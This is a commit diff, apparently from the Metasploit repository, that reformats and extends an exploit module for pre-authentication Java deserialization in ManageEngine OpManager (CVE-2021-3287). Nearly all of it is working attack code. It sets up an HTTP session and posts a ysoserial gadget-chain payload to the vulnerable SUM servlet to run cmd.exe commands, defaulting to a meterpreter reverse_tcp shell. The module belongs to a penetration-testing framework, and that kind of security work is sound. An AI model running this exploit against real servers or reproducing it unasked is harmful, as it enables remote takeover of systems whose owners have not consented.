Apply rubocop changes and fix all targets

rapid7 · Sep 13, 2021 · bfd9857 · bfd9857
1 parent 638fa77
commit bfd9857
Showing 1 changed file with 37 additions and 27 deletions.
diff --git a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb
@@ -7,29 +7,29 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'ManageEngine OpManager SumPDU Java Deserialization',
-      'Description' => %q{
-
-      },
-      'Author'       =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',
+        'Description' => %q{
+        },
+        'Author' => [
           'Spencer McIntyre', # Metasploit module
         ],
-      'License'     => MSF_LICENSE,
-      'Platform' => 'win',
-      'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-      'References'  =>
-        [
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'References' => [
           [ 'CVE', '2021-3287' ],
           [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]
         ],
-      'Privileged'  => true,
-      'Targets' => [
+        'Privileged' => true,
+        'Targets' => [
           [
             'Windows Command',
             {
@@ -45,7 +45,7 @@ def initialize(info = {})
             {
               'Arch' => [ARCH_X86, ARCH_X64],
               'Type' => :win_dropper,
-              'CmdStagerFlavor' => :certutil, # This works without issue
+              # 'CmdStagerFlavor' => :certutil, # This works without issue
               'DefaultOptions' => {
                 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
@@ -61,32 +61,40 @@ def initialize(info = {})
               }
             }
           ]
-      ],
-      'DefaultOptions' => {
-        'RPORT' => 8060,
-      },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2021-07-26'))
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8060
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-07-26',
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Stability' => [ CRASH_SAFE ]
+        }
+      )
+    )
 
     register_options([
-      OptString.new('TARGETURI', [ true, "OpManager path", '/'])
+      OptString.new('TARGETURI', [ true, 'OpManager path', '/'])
     ])
   end
 
   def check
-    # todo: write this
+    # TODO: write this
     return Exploit::CheckCode::Unknown
   end
 
   def exploit
     # Step 1: Establish a valid HTTP session
     res = send_request_cgi({
-      'uri'          => normalize_uri(target_uri.path),
+      'uri' => normalize_uri(target_uri.path),
       'keep_cookies' => true
     })
-    unless res&.code == 200 && res.headers['Set-Cookie'].to_s =~ /JSESSIONID=/
+    unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/
       fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')
     end
+    print_status('An HTTP session cookie has been issued')
 
     # Step 2: Add the requestHandler to the HTTP session
     res = send_request_cgi({
@@ -99,6 +107,7 @@ def exploit
     unless res&.code == 200
       fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')
     end
+    print_status('The request handler has been associated with the HTTP session')
 
     # Step 3: Exploit the deserialization vulnerability to run commands
     case target['Type']
@@ -120,13 +129,14 @@ def execute_command(cmd, _opts = {})
 
     # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the
     # dependency on the commons-collections library making it usable in this context
-    java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)
+    java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', "cmd.exe /c #{cmd}")
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),
       'keep_cookies' => true,
       'data' => [ java_payload.length ].pack('N') + java_payload
     })
+    fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200
   end
 end